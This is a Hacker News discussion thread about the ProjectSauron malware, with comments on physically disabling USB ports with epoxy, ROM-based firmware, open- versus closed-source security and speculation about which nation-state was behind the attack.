Hacker News new | past | comments | ask | show | jobs | submit login
Researchers crack open malware that hid for 5 years (arstechnica.com)
357 points by rando444 on Aug 9, 2016 | hide | past | favorite | 221 comments



Interesting regarding USB devices. When US DoD systems were infected with a virus someone brought from home on a USB stick, I remember hearing there were going around filling USB ports with epoxy. There was some method behind the madness I guess.

There is also a market for routers and other devices which are produced as much as possible in US (are they rolling their own capacitors I am wondering...). I saw some of those devices come with a 100x markup. $400 device from China vs $40k from US. Those who sell the $40k know how hard it is get on the list they are milking it for all its worth (the sales person was quite frank about it).

It was also funny to see "Windows" as an approved security blessed OS and then Debian, Ubuntu, OpenBSD rejected (with only ancient version of RHEL's approved for Linux).


I wouldn't call RHEL 6 ancient. Thankfully this may be going away at some point in the future, leaving it up to agencies to certify products or stacks on their own merits, or to instead have them be evaluated for specific purposes if sold as solutions: https://www.niap-ccevs.org/Documents_and_Guidance/ccevs/GPOS...


I was still seeing 5 used often, sometimes 4.

And 7 despite being out for 3 years? is still not certified.


There's a STIG already for RHEL 7, for what it's worth.


>I remember hearing there were going around filling USB ports with epoxy.

And we all laughed at PS/2 keyboards and mouseeses


You can boot an original IBM PC off the keyboard port. Look for the MFG_BOOT function here:

https://www.iee.et.tu-dresden.de/~kc-club/DOWNLOAD/DISK401/R...

Basically, the device connected to the keyboard port has to reply with code 0x65 when it's initialized, then the BIOS will read some bytes into memory and jump to it. Not sure whether this was brought forward to newer models or clones, though so it's just some fun trivia...


The original IBM PC switch was like the back switch on current PSUs. If it were on it would be booting anyway, right?


And that's why you can still buy new i7 and Xeon motherboards with PS2 keyboard connectors--because some sites don't want there to be USB ports on the computers.


My computer is locked in a mesh cage anyway. Well, the thin client is.


That's another great idea! Like the cages around thermostats!


Just put the software in the device in ROM, a forgotten technology. No malware will survive a power cycle.

It's like I read that malware could infect your "internet of things" thermostat and then hackers could remotely turn off your heat until you pay ransom. Just put the dang thermostat code in ROM. Power cycle, goodbye malware.

For more critical stuff, just have it regularly power cycle itself.


If you haven't seen it yet, you may like the stateless laptop idea: http://blog.invisiblethings.org/2015/12/23/state_harmful.htm...


Then you can't do over the wire updates, which means no fixes after it's been manufactured and installed, which would probably increase the costs quite a bit.


> Then you can't do over the wire updates,

Which, of course, is the whole point. If ROMs do cost more, I bet people who want secure systems would be quite willing to pay a bit extra.

It would be too expensive to put an OS in ROM, but the ROMs could contain the hashes of the OS on disk, and can verify the disk image before booting.

And besides, why would I want over-the-air updates to my freakin' thermostat?


Another way is to have a jumper that is required to enable the write cycle to the flash ROMs. That enables the manufacturer to update the ROMs before shipping, then remove the jumper.

Anyone trying to compromise the device would then require physical access.


Make it a button, so the customer can apply updates, but they need to press a button to make it happen. Add another button which, using only software stored in ROM, reloads the firmware from ROM. Then you have updates, but only when the customer knows and wants it, and if they ever screw it up then they can get back to a known good state.


The customer has no way of knowing whether they are installing genuine update, or MITM-modified malicious update. Public key cryptography solves that but then you have a problem how to protect the keys and crypto algorithms from tampering.

Update buttons ain't a good replacement for TPM hardware.


It's an enormously harder problem to convince the customer to push the "update firmware" button on the front panel than it is to insert malware remotely without any action or knowledge on the customer's part.


It’s enormously easier problem to exploit a well-known remote code execution vulnerability, that’s unpatched because updates are too easy to ignore.

For the end user, it’s extremely easy to NOT push that button.


It's not a panacea, but nothing is, and it would help a lot. It's not supposed to be a replacement for anything, just an addition.


Yup, that's the way to do it.


This is literally how everything was made until the very recent past. Next you'll be telling me that you can ship software on physical media.


One may consider that an incentive for manufacturers to make sure their code is working correctly before shipping it.

In many cases that would probably be prohibitively expensive, but for a thermostat or a light switch, it should not be that difficult to do.


Prohibitively expensive? That's how things have been done for decades. Only recently have manufacturers decided that everything should be redoable over the internet.


Are you including the capability to control it over a network? Burning potentially unfixable 0-day exploits into ROM would probably be a non-starter.


If you can update the firmware over a network, you have an uncloseable exploit vector.

ROMs are not unfixable. They do require physical access, though, which eliminates nearly all of the risk.


Even if those updates require signature verification with a public key stored in ROM? I guess the signing key cold get out or you could patch the firmware to skip the signature check (the way the initial iPhone was jailbroken)


We also literally just had the Windows key leaks within the last week. Un-updatable signing keys are still an uncloseable exploit vector. (And updatable signing keys are an uncloseable exploit vector. You can't win.)

Physical-access-only updates: yes please. We know what the security boundary is on those, and how to reset it.


Malware infection module can be stored nearby on different device infecting your target device every time you power it on, until you patch your device.


Right. But each device that uses ROMs is one less attack vulnerability.

After all, if attacks can target A, B, or C, that is no excuse to not fix B.


> No malware will survive a power cycle.

Not true at all.


Please explain.


I'm not the original poster, but unless you're talking about a very simple embedded system, most computing devices have lots of areas for malware to live that will survive power cycles. HDD firmware, graphics card firmware, various controllers have their own firmware, NIC cards have their own firmware, etc.

Even if the boot device is read-only, it would be a huge challenge to build any kind of system without these vulnerable components.


Every one of those devices that is done with ROMs closes another door to malware. It's certainly far more doable and reliable than ensuring the software doesn't have holes in it.

There's a huge market for secure items - routers, cars, thermostats, medical devices, avionics, ATMs, etc. I simply don't understand why ROMs aren't used.


Part of the reason that Windows is an approved OS is enterprise support. When you pay for hundreds of thousands of licenses for a product you can demand features. If the DoD went with Debian they would need an entire corps of developers to maintain government specific patches. Ubuntu offers enterprise support but it's from an African country and that is undesirable as you mentioned above.

I've seen government systems running Windows (USA), Mac (USA) but the strangest I've seen is SUSELinux (Germany). I have no idea how they got SUSE approved when Red Hat is more "American" but some agencies don't have to follow the rules.


SUSE is owned by Novell.


Not anymore, IIRC. When Novell was acquired by ... that company whose name I forgot (AttachMate?), SUSE was spun off as an independent company again.

At least that is how I remember it.


Yeah it seems things have gotten a bit more complicated than i remembered.

Novell bought Suse, then Novell merged with Attachemate, in the process Suse became a business unit (wholly owned company?) under Attachemate, then there was a merger between Attachemate and Micro Focus in 2014.

Anyways, i suspect that as Suse is FOSS, and was initially Germany based, and now is UK based, both being NATO allies, that DOD has few issues with continued usage.


SAP seems to have a strong preference for SUSE. SAP may have stewarded SUSE through accreditization processes.


It's well known that all of Germany's media, intelligence services, and politics was set up by the US after the war.

From what is seen on the geopolitical landscape, Germany is a vassal state of the US.


Too many people without security clearance can access and modify Linux. In any real security environment, open-source is poison. Period, end of story.


^ As if any amount of security clearance can erase human fallibility.

In any real security environment, humans are poison. Period, end of story. This is not an issue exclusive to open-source.


Of course not, but it's exacerbated by open source. Humans are indeed poison, which is why it's normal to involve as few humans as possible. Unfortunately AI is not sufficiently advanced so you still need some of them in order to get the job done.


This is a falsehood. One of many sources: https://news.ycombinator.com/item?id=7203211 (HN discussion of Snowden using wget to scrape NSA internal sites)


So security through obscurity?


Or maybe security through, you know, actual security.

Closed source does not mean obscurity–– and open source does not mean clarity (see OpenSSL, that one Linux 2.6 thing¹, etc).

It's not like being proprietary suddenly means the only security is through obscurity. Why do you think that? Are you just a zealot? Did you not consider that closed source software could be well-engineered and secure? You're welcome to read about some of the security features in Windows NT² (that article is a bit old but still relevant), which are considerably more thorough than (non-SE)Linux (I think SELinux has auditing now, so it's at least comparable to NT).

Now, don't get me wrong, I generally prefer open-source tools (for a variety of reasons) and tend to trust them more, but saying stupid stuff like you are just gives open source a bad name.

On top of that, obscurity is a perfectly valid layer of security. To use a mediocre analogy, of course you want your safe to be strong enough that nobody could break in even if it's in plain sight—but it's certainly not a bad idea to hide the safe as well.

¹ https://lwn.net/Articles/341773/

² https://www.microsoft.com/resources/documentation/windowsnt/...


I wasn't saying it was only secure due to obscurity. I should asked more clearly - "So the idea is to enhance security through obscurity?" For mission critical secure systems, I can see a case being made that software should be closed source, as it allows fewer people to be aware of potential attack vectors. Especially, if you know the software you are creating won't be used externally much or audited.


So you trust the black boxes someone sold you?


The opposite of “open source” isn't “black box”.


Not the person you're replying to but opposite of open source is closed source, and isn't that basically a black box to you since you don't know what it's doing?

Is there something more subtle I'm missing?


Yes. Microsoft offers source access to Windows. IBM and Oracle will rent you people who know the details of their software. None of those companies' offerings are particularly ‘black box’-y, in spite of being very closed source.

‘Open source’ is more about the development model (and freedoms) than about the nature of ‘knowing what the software is doing’.

Heck, I could argue that Linux is a black box to most people who aren't well-versed in kernel development. OpenSSL is notoriously difficult to understand. Sometimes huge bugs look relatively innocent¹ even with people looking at the code.

¹ e.g. https://lwn.net/Articles/341773/


At the level of security where you need to be paranoid about the operating system developers, how do you know the source code Microsoft shows you, corresponds to the Windows binaries running on your machines? (Let alone to the sum and total of all binary patches applied thereto?)


A source license probably also gets you the build system, or if not maybe you could throw more money at them.

But reproducible builds are a hard problem, so… honestly, I can't answer that.


And that's what I really mean by 'black boxes'. Yes, you can buy access to, e.g., Windows source, but that doesn't mean that what you review and what is running on your systems are the same thing. And I can't even speak to all the third-party bits that get compiled in to an instance of Windows. It's a really, really hard problem.


Well, end of story. That's it then. No more discussion can be had!


>filling USB ports with epoxy

This seems apocryphal. Its trivial to disable USB for a mass storage (or all devices) via things like group policy or other security controls. Or disable the controller. Those USB ports aren't perfect boxes, the epoxy would just run out all over the place. More than likely you'd have an OS-level security policy and bios block, which is trivial to do in a managed environment.

I hear this type of story from time to time and frankly its the sysadmin version of "he hacked us with a visual basic gui!"

>$400 device from China vs $40k from US.

I'd rather trust my network with a warrantied Cisco with same-day replacement than a $400 Abibaba sourced ROUTER PLUS SHENZEN SPECIAL with two weeks delivery. I suspect you've never managed a non-trivial network before, let alone one with real security policy if you'd consider running that and thinking you're secure.


> This seems apocryphal. Its trivial to disable USB for a mass storage (or all devices) via things like group policy or other security controls. Or disable the controller.

The question is - where do you stop? The controller could be re-enabled from a lower level, etc. The rabbit hole goes very deep. Sometimes it's best to just take control of the physical layer and call it a day.

> Those USB ports aren't perfect boxes, the epoxy would just run out all over the place.

Epoxy putty would work pretty well, and it's widely available.


There's also value in being able to visually inspect it and say "Yep, that USB port's disabled" versus digging through EFI settings.

Every motherboard is going to have that option in a slightly different place, but if you can put epoxy in one USB port you're pretty well set for any piece of hardware.


This scales to ${number_of_devices_you_can_see}. A hundred or more? Easier to manage remotely. You're also likely to have a very limited number of models in that case.


One thing to keep in mind is that the kind of place which cares about things this much tends to be the kind of place which can hire staff — and it's a lot cheaper to hire technicians who can verify that epoxy plug than the security engineers who can confirm that you've done everything right in software.

Consider another instance of the problem: verifying that your webcam isn't being used to spy on you. Since a surprising number of hardware designers were negligent and made that software controllable it is orders of magnitude easier to simply deploy a piece of tape than try to prove that malware hasn't disabled the status LED:

http://security.stackexchange.com/questions/6758/can-webcams... http://blog.erratasec.com/2013/12/how-to-disable-webcam-ligh...

How much skill and diligence does it take to confirm that you have disabled the controller using each manufacturer's interface (if they even have one documented), that there isn't some way to re-enable it later (or that something like a sleep/resume cycle didn't reset the controller), and that all of that continues to be true for every subsequent configuration change or software/firmware update?

I would suggest that any organization with this level of risk would be better off paying someone $15/hour to check the ports along with the rest of their physical status checks and put the security engineers in charge of other improvements with a higher return.


The thing is, if you manage those things remotely, so can an attacker. I imagine it would not be impossible for a sufficiently skilled and determined attacker to remotely re-enable the USB ports.

If you are paranoid enough or have actual reason to believe somebody would want to invade your network, epoxy is one way you can be really certain no one can hijack your network via an infected USB flash drive.

EDIT: Of course, if gluing the USB ports shut is all you do stop attackers, I am pretty much begging for trouble. And as somebody pointed out, disconnecting the USB ports from the main board, possibly disabling the pins is probably a better idea, as well as disabling the USB controller in firmware and locking the BIOS / setup, if it is part of a ... let's say comprehensive approach to securing your network.


> Sometimes it's best to just take control of the physical layer and call it a day.

If you want to stop your every day user from plugging in USB drives then this is probably all you need to do. In a scenario where you're concerned about insider threats with even a minimal level of computing knowledge, you have to lock down the BIOS and the OS layer as well. "Oh the IT guy put epoxy in the USB ports, guess I'll just take the case off and plug into the USB ports on the motherboard"


You can also cut the traces or epoxy the internally ports as well. It's not hard. It's just about what level of threat do you want live with. I imagine you could always defeat this by cutting through the epoxy or gently sanding the board to put probes directly on the traces, but then again security is all about depth.

I have a friend that worked at LLNL and she used to talk about secured laptops having their USB ports epoxied and the traces physically cut on the camera and microphones to help secure them. I think even the wifi and bluetooth were disabled as well.

After hearing these stories, it made me chuckle at Zuckerberg's masking tape.


Well, of course this doesn't give you a get out of jail free card. You still have to pay attention to the other layers in the stack. This is only about paying attention (or not) to the physical layer directly (as opposed to handling physical security indirectly in higher layers).


Case intrusion sensors are a thing. And i swear i have seen cases with loops for padlocks.


Padlocked cases are common on school computers.


Yeah i should have suspected. Have not set foot back there in ages though. Thinking about it i guess schools may be some of the most hostile computing environments in civilian life.


> Thinking about it i guess schools may be some of the most hostile computing environments in civilian life.

Long time ago, I've briefly managed an environment like that. It was crazy. Kids are really good at breaking stuff in creative ways.


For a hardened PC, the first thing I'd do is burn the BIOS into ROM. Read Only Memory. ROM cannot be infected.


Or to put it another way: "ensuring you've secured all hardware and software exploits in your stack from top to bottom" vs "epoxy and focus on network exploits". Don't knock physical security.


> The controller could be re-enabled from a lower level, etc

In a managed environment you could do it via the BIOS trivially, which is most likely locked as well. I mean, glueing the ports is especially stupid. You can chip glue off with your fingers or a key. If you're doing physical things to the PC, you'd most likely just remove the USB header from the mb and call it a day. Pop-open the case the case, remove it, bend down the pins, or cut it and go about your business. Messing with stuff that takes 60 minutes to cure is ridiculous. Ignoring the OS security policy is ridiculous. Ignoring BIOS controls is ridiculous. Ignoring how security is handled in managed environments is ridiculous.

It would take two minutes for a stoned teenager to pop-open the case and plug in his own USB connector into the header in this scenario. Less time for a determined attacker.

I imagine some middle-manager asshole asked for a piece of plastic to block the panel to make it 'look nice and remind people they're blocked' and some paper-pusher took it as "OMG THEY GLUED THE PORTS TO STOP HACKERS" He was just ignorant of how IT security is really done.

I think its obvious HN is mostly web-devs, not sysadmins or security people if stuff like this is widely believed and comments contrary to it get instant 'disagree downvotes.' If you think the NSA and the DoD just glue ports instead of doing real security, then I don't know what to say here.


Rather than immediately assuming you know more than the people who implemented this, try to consider why someone who is theoretically smart would want to do this. Also consider that most organizations implement multiple layers of security, adding another layer of security can't hurt here.

> In a managed environment you could do it via the BIOS trivially, which is most likely locked as well.

The BIOS may still not be low-level enough. There is nothing preventing a buggy xhci controller, chipset, BIOS, etc, from being exploited by a rogue USB device. It would be prudent to disable USB in the BIOS AND physically disable the ports somehow.

> Pop-open the case the case, remove it, bend down the pins, or cut it and go about your business. Messing with stuff that takes 60 minutes to cure is ridiculous.

You do not need epoxy to fully cure, you only need it to reach a point where the viscosity is high enough that enough of it won't drain out of the USB port when you turn the computer on its side. This can easily be under 5 minutes, depending on the type of epoxy and you could even trivially avoid that wait time by putting a piece of tape over the epoxied port. It may also even be cheaper to implement, since you can pay someone minimum wage to fill ports with epoxy, but it takes a slightly higher skill level to do work inside of computer cases. Additionally, it's easier to visually verify that all USB ports are epoxied than it is to verify that all internal USB connectors have been disconnected. Additionally, consider that many motherboards have rear USB ports directly soldered onto the motherboard, which would take far more effort and skill to disconnect than it would to just fill the port with epoxy.

> It would take two minutes for a stoned teenager to pop-open the case and plug in his own USB connector into the header in this scenario. Less time for a determined attacker.

An attacker who has broken into the government building is not the person who this is intended to guard from. It is intended to guard from employees accidentally inserting compromised USB devices into their computers. If the attacker is opening your computer case, they have many more options than USB ports for delivering an exploit payload. Though it's also very likely that these cases are also physically locked and have case intrusion detection enabled. Not that those protections are particularly difficult to get around either. This may also even help IT avoid support phone calls from users saying "hey, how come my USB port doesn't work?" where epoxy in the ports shows some serious intent.

Additionally, in the case of a real attacker who has physically entered the building, and intends to deliver their payload by flash drive: formerly they could just waltz by some computer, pop a drive in, and walk away. Now they'd need to at the very least open the case, which at the very least makes it take slightly longer for them to deliver their payload, and is much more likely to draw suspicion.


Yeah, the curing time can vary from 1 minute (or even less) to several hours, depending on epoxy type. Now mix it with some filler to make putty (or just buy epoxy putty ready to use) and even the curing time is no longer critical.

Anyway, you know the discussion has gone down the rathole when you're debating the relative merits of epoxy recipes for securing computers. :)


> This seems apocryphal.

I have no reason to believe the person I worked with would make it up. There would just be no point in it.

> Its trivial to disable USB for a mass storage (or all devices)

Except there are hundreds of different kinds of devices, and you tasked with quickly "doing something to fix the problem". Do you have time to go and dig through different types of BIOS menus or open the cases to all of the machines. Or is it easier to get epoxy plungers and send an army of people from desk to desk. Normal epoxy is a pretty decent electrical insulator (some board or components used to even be dipped in epoxy to protect from environmental damage or tempering).

> I suspect you've never managed a non-trivial network before,

No, but I was selling a solution with one in it. And $40k was making a decent size cut in the profit margin.


Why not just unplug the USB header if you want a physical solution? The idea that you're shoving glue in there is incredibly ridiculous. You can chip that off easily with your finger or a key. I seriously doubt this is a real story because it flies in the face of published STIGS and basic common sense. Nor would it stop a remotely determined attacker/idiot.

That said, I could see glueing a panel to block them as a visual to remind people that those ports are off, but not as a primary blocking device. More than likely its done via security policy.


They epoxied the USB ports on my secure machine when I worked at one of the national labs about 12 years ago. One day I came in and the admin had gone through everyone's office the evening before with a bunch of JB weld to fill the USB ports.

So, whether or not you believe that it is a useful solution, it certainly did happen. As for alternatives to gluing, I assume that was time related: filling in a port is certainly faster than opening thousands of machines to give them a physical port-ectomy.


Port-ectomy: a new word in my dictionary, must remember to use it someday!


> You can chip that off easily with your finger or a key.

Because it was more of a reminder for stupidity. "Oh, look there is glue in there, that's right we not supposed to stick random USB devices in there". If the machine is on their desk, yes, they could plug in a PCI device that has an USB thing on it and still connect. But by that point they are really going out of their way, they are opening the case and such, and it will be very hard to maintain the idea that it was just a stupid mistake.


Exactly. The other related threat is the new junior admin being asked by a senior exec to allow (windows policy-wise) the USB storage just temporarily. "Because I need this presentation NOW as I have to get to the airport in 45 minutes!


Rear USB ports are not attached to the motherboard via trivially removable connectors.

It also really is not trivial to chip off most types of even general-purpose epoxy with your finger on a flat surface, let alone a tiny USB port which your finger doesn't fit in. If the epoxy was selected with some level of care, it may be very, very time consuming, or nearly impossible to remove, even with the right tools.

No matter what, it's a helpful measure in addition to every other way you can also disable a USB port.


well the thing is i dont know if you know it foxconn builds your ciscos i only know cause i worked installing fiber in the plant they have in houston its one of a number in the US. in there i saw lots of chinese ladies putting together made-to-order cisco switches of all sizes with boards i assume were made in china. oh dont get me wrong the americans worked in sales out front. :)


What is the role of an InfoSec professional in an environment where advanced threats like this are being deployed? I mean, a beat cop knows when it's time to call the FBI or the military. But the open nature of the Net means that firewall probes by script kiddies are interspersed with intrusions by nation-state actors. It's a weird state of affairs.


Work with stakeholders to minimize lateral movement after a breach, get monitoring in place to detect breaches, and have a response plan.

If you have company critical secrets or life-safety systems, you need to air gap where possible.

That's you're job. You cannot stop or prevent attacks, and if option don't have the metrics and logs, the FBI won't be able to do anything, assuming you can get them to give a shit.


I'm sure the nation-state actors couldn't be happier about the confusing nature of that, and cultivate it within reason.


> The researchers went on to speculate that the project was funded by a nation-state, but they stopped short of saying which one.

So ... does anyone, perhaps who doesn't have Kaspersky's business interests to protect, care to actually speculate? In other cases it's been seemingly well-known in the security community which APT attacks trace back to which countries, it's just apparently impolite to say it in public.


Russia, Iran, Rwanda... Let's assume the latter is a vector, not the target. (The attacker is sophisticated enough that we can assume Rwanda itself is of little interest). Rwanda also has fairly close ties to Russia, which strengthens the vector hypothesis.

Russia+Iran suggests a western actor. Their biggest shared interest is Syria, I'd think. And look, the Syrian conflict is on since March '11, and the activity according to Kaspersky reaches back to June '11. I'd say that's quite close.

Neither the US nor Europe were that deeply invested in Syria. There is, however, one small middle-east country that has quite an interest in the entire region, and also isn't friends with Iran or Russia. And it just so happens that Israel is somewhat of a close affiliation of Rwanda.

None of that is in any way conclusive, but it certainly is probable.


> and also isn't friends with Iran or Russia

Actually Israel is on very friendly terms with Russia. There are a ton of Russian immigrants in Israel to the point that Putin called them "Russian ambassadors".

It didn't start that way - part of the history of the creation of the modern state of Israel is Russia vs US proxy conflict (of sorts) via Egypt. But it's not like that anymore, not for a long time.

(The US and Russia have moved on to other proxies :)


While I'm not a proponent of the idea that Israel is behind this malware, I disagree with you. Israel is not on particularly good terms with Russia. Yes, the two governments have established a hotline to ensure that Russian military maneuvers in Syria are not misinterpreted, but the two countries are closer to foes with a mutually accepted cold peace. It's in the strategic interests of each country not to be outwardly hostile to one another, but they're definitely adversaries in many respects.


The list of countries with a known infection suggests a Western nation acting alone, or in cooperation with others (for instance, the "Five Eyes").

Alternatively, one of the infected nations could also be responsible. Infecting selected systems inside your border could be a way to deflect attention when the hunt for the malware' authors began.

Pure speculation on my part, and nothing particularly new.


Remember you got the list from a company lead by ex-KGB, with very close FSB (and Putin) ties. Kaspersky himself studied in a KGB sponsored school. He even met his wife at a KGB holiday resort.

Not suggesting anything, just keep that in mind.


Kaspersky has significant ties to the Russian government, so presumably some nation-state who Russia opposes.

This likely means the USA, a US ally like Israel, or a growing power such as China or India.

But the USA is the most likely candidate.


Apple's walled garden has been subjected to criticism from open source advocates. And Windows 10's telemetry triggers a lot of privacy concerns, too.

But in our current security environment, what if these walls become necessary for secure computing? By analogy, there's a reason that many ancient cities were circled by a wall.


> By analogy, there's a reason that many ancient cities were circled by a wall.

Walls around cities were likely very poor at stopping small, stealthy groups of infiltrators. They were designed for much more brute force attacks. Apple's walled garden helps quite a bit with the deluge of crap that would be available without it. Without it there would be an order of magnitude more crap (in quantity and quality). That said, there's a vibrant black market for people that can't stand the oppressive policies of Apple.

Additionally, once you have a wall in place, it's easy to make a decision to tax certain types of traffic through it because the capability is now there, whether or not it's in the best economic interest of the people inside. Apple didn't skimp on this area. The wall was erected with tithes and taxation in mind, and collection booths at all the gates.

So, does it help? Well, it prevents roving bands of bandits from riding in, terrorizing and robbing the people unlucky enough to be in their path, and making a hasty exit, so yes, but if you're a tasty enough target, getting past the wall isn't really a problem. There are myriad ways to do that as long as you're careful. For example, the numerous secret tunnels through the wall. They aren't large, and they are constantly being filled in by the city engineers, but there's always some they haven't found if you are willing to ask the right people (or dig your own).

Okay, I believe I've tortured this analogy enough...


I'm not sure that is a good analogy for the wall. Is it a different wall protecting thousands of cities or one of maybe ~10 walls (the main OS's) that is reused? Would it be that hard to build a few good walls? As you said though, there are always alternative ways to be attacked - robbed on the highway (man in the middle?) etc.


Devil's advocate, walls and the enablement of taxation also centralized capital and enabled cities to spend it on public works that might not have been built otherwise (and before I get the "then they shouldn't!" retort, I think we can all agree there are shared infrastructure resources that w/couldn't be built by private actors).

In a world where all phones are loosely controlled Android derivates competing on slim profit margins, is anyone going to make the drive for hard hardware-enabled crypto? And even if they wanted to, could they afford it?


> Devil's advocate, walls and the enablement of taxation

Sure. I wasn't making a case that taxation at the wall is bad, but that it has the capability to be bad. We use regulation in (mostly) free markets to greater or lesser success to steer the markets in some manner. If you accept that pure capitalism doesn't necessarily yield an optimally performing system when people are involved, then that ability to influence the market is a useful capability, especially when applied judiciously. A blanket rate isn't necessarily the most efficient form of that, but it is a way to raise revenue.

> In a world where all phones are loosely controlled Android derivates

I think you've already stacked the starting conditions to the point where it's not really worthwhile to consider. That situation would be ripe for disruption in some manner, because I think it's inherently unstable. All it takes is a small niche market for alternatives that do make choices based on privacy, or security, and events that spur interest in those topics, and the larger population of providers will need to respond appropriately or risk ceding a increasingly large portion of the market to those that do.


I think the outcome of the first generation of smartphone OS's has (surprisingly for me at least) shown that there's really only room for a handful of players (Android/AChina, iOS) with sufficient numbers of users to be self-sustaining.

As you note, not sure a unipolar outcome would ever be stable enough to have persisted, but I wouldn't have expected a bipolar arrangement either. And I can imagine a market structure that would have depressed manufacturer profits far enough so as to preclude serious R&D / innovation on their parts.


You know, it's common enough to have one dominant player in a marker, a small few chasing players, and then a bunch of very niche players that I'm there's a lot of economic theory behind it that I'm unaware of. It probably relies quite a bit on how invested in the product you are once you've decided on it, but there are plenty of examples throughout history[1],

1: http://images.dailytech.com/nimage/Smartphone_Market_Share_2...


Let's keep this in mind the next time we get the idea to let market forces regulate, say, school systems or infrastructure.


The problem with Windows is that it is just a wall made of glass


I suspect your comment will be met harshly here, but I agree for at least a subset of users. If you regularly read HN, you probably can see the clear downsides of the so-called 'walled garden' approach. I can too. Then I have a 10-minute conversation trying to help my mother-in-law with whatever Best-buy recommended cheap PC she purchased 2 years ago, and I am convinced that she needs the walled garden.


There was a pop up which said that there was a virus and I needed to click ok to get it removed

I swear to God I'd put adblock on that laptop to reduce this risk. Not to mention there must have been multiple click throughs for the different hurdles to install the malware. This is not a problem I envisage happening on Mums iPad though, and there's a lot to be said for that piece of mind


I'm definitely an advocate of open source myself, and I never thought I'd be considering the other side's arguments. It's just that I see major data/security breaches increasing in the news, along with stories (like this one) about cyber-offensive capabilities growing more and more powerful. In the InfoSec world, it seems like anything is hackable, and the balance of power firmly lies with offensive tools. I'm just scratching my head about what the appropriate defensive strategies are going to be, given that Chinese and Russian state-sponsored hackers are known to attack civilian targets. I'm not sure how we're supposed to secure our government, financial, and tech companies against these players.

For all of their known (and probable) capabilities, our three-letter agencies don't seem too concerned about encouraging defensive technologies and securing domestic networks.


What do you mean "attack"? Is there some specific harm being done that you want to protect against? Breach of defenses isn't itself an attack. A foreign agent inside your castle isn't an attacker until they start stabbing people, right?

I'm not personally worried about what Chinese and Russian hackers know about me, because none of that information is particularly useful for taking valuables from me. I am curious what your experience is, just so I can understand the context of your concern.


I'm concerned about industrial espionage: http://www.cnbc.com/2015/10/19/china-hacking-us-companies-fo...

Also at personal risk is anyone with a US security clearance: https://www.washingtonpost.com/news/federal-eye/wp/2015/07/0...


How do you assume that the information isn't useful? That implies that all your valuables are fully isolated from the digital world - really? I really have trouble understanding the "I have nothing to hide" attitude. What's the difference to saying "there is this guy always standing in the corner of my living room, but I'll just assume he's benign..."


Well I would notice if something valuable to me is taken.


I know exactly what you are talking about. I'm just really afraid of what the knock-on effects are going to be of starting kids out in walled gardens. I wouldn't be an engineer today if it wasn't for the fact that it was possible for me to play with various languages, or start distro hopping in high school with a 433Mhz PC. These walled gardens make it easy to keep everything working, but come at a high cost of actually learning what the device does.


But what if the wall have holes in it and you don't even know about it? What if the "bad guys" will uncover the holes before you? Or what if you will know but you still can do nothing about them? What if the "bad guys" are the ones who built the wall, not to secure you but to contain you?


The walled garden doesn't mean it lacks hidden doors (intentional or via hacks) for bad actors. It just means you, the user, have less control of your machine than the OS does. It's as likely to wall you in with malware you can't remove, as to wall it out.


How about a FLOSS archive that provides peer-reviewed and signed application from a trusted source only? Automated security updates? A security team that can provide fixes independently from the upstream authors?

...because I just described how Debian worked for the last 20 years.


I'm curious: How realistic is building malware like this? Is this something that has been done out in the open by researchers? Is there an example we can see, or is this all still rumors?

The reason I ask is because there's actually value in spreading the rumor that a capability like this exists. Imagine if your adversary believed that you could gain access to their computers even when they're not connected to the internet. They'd run themselves in circles trying to secure everything!

In general, I believe this article to be true, but would love to learn more of the details.


From Kaspersky Lab's analysis:

>What would ProjectSauron have cost to set up and run?

>Kaspersky Lab has no exact data on this, but estimates that the development and operation of ProjectSauron is likely to have required several specialist teams and a budget probably running into millions of dollars.

https://securelist.com/analysis/publications/75533/faq-the-p...


It would take an inordinate amount of time for a person to build something like ProjectSauron, but after reading the link, it uses a wide range of publicly-known techniques (windows key loggers, password filters, DNS/ICMP exfil, named pipes, etc etc). This software seems to do a good job at amalgamating a wide range of methods.


Read this as an "introduction" and then you'll be able to understand why the researchers can be so sure that specific kind of malware must be state sponsored:

http://www.nytimes.com/2012/06/01/world/middleeast/obama-ord...

http://www.langner.com/en/wp-content/uploads/2013/11/To-kill...

Simply, the goals ant he methods of the commercial malware are fundamentally different to those that can be recognized in the state-sponsored malware.


This is realistic; there are examples you can see.

Have a google around for Stuxnet; a fairly advanced piece of malware which went after Iranian nuclear enrichment centrifuges. It used five previously unreported Microsoft vulnerabilities and a bunch of fairly advanced techniques including jumping airgaps like ProjectSauron does via USB.

There are samples of Stuxnet kicking about, if you want to take a look yourself there's nothing stopping you. Although, you may be there a while.


It is real, and many similar samples exist. People in the industry can usually ask around and get copies.


That is a really impressive piece of software. USB exfiltration of data on air gapped machines is next level. I'm in awe of their skill.


If your machine has a USB port, it's no longer properly isolated.

Obviously that's a tremendous pain to work with, because you're limited to PS/2 keyboards and mice (etc etc), but given that there's no way of authenticating USB devices and they've already been used in various attacks, a serious airgap protocol has to ban USB ports.

You could quite easily hide a USB mass storage device inside a mouse, or with a bit more work have an unmodified mouse with a spare Flash area used for data exfiltration.

(Firewire is even worse, and Thunderbolt lets you onto the PCI bus)


> a serious airgap protocol has to ban USB ports.

This is slightly too strong – it should be “has to ban unsecured USB ports”. By 2002 or so, people I met who worked at SPAWAR were advising conference attendees to follow their standard practice of epoxying necessary USB devices to the computer and completely filling unused ports. That moved USB into the same difficulty class as other physical access attacks, which they were already depending on building security to restrict.

Also note that while it's true that Firewire and Thunderbolt are definitely still riskier, newer versions of Windows, OS X, and Linux can use the IO-MMU to prevent DMA attacks. That started shipping in OS X 10.7 and Windows 8.1 (only when locked) and OS X 10.8 enables that all of the time for hardware made around 2012 and later.


If you just leave away the USB mass storage kernel module when compiling the kernel, the mass storage device won't work anymore while the mouse still works. I wonder if this is a solution to this problem or not since it seems quite naive.


This is not sufficient. One known vector is to emulate a USB network device that provides a nameserver via DHCP, but no default route,allowing the attacker to MitM chosen connections. And of course you have a plethora of different USB device types with default drivers that probably contain exploitable bugs.


Just speculating: this might mitigate some kernel level exploits but since its typically usb card <--> usb bus/controller <--> PCI bus, presumably hardware or kernel bugs elswhere in that stack could still be exploited. Interesting thought!


Any USB device gets to be a keyboard and mouse. If it comes down to it, the device could just "type" its payload.


And if that malware can't liberate USB access, and still needs to read data (rather than just writing it), it could exploit the capacity for various devices to emit detectable EM radiation. The fake keyboard/mouse, being inside the Faraday cage, would be able to sense that radiation and extract data that the malware in its payload sends back to it.

In fact, all of this would work equally well with a PS/2 port.


Too easy to have that undone by a security update later. Better to physically disable the ports (fill them with epoxy for example). Much more foolproof and easy to verify.


The BIOS may access USB devices e.g. during boot or config.


> You could quite easily hide a USB mass storage device inside a mouse

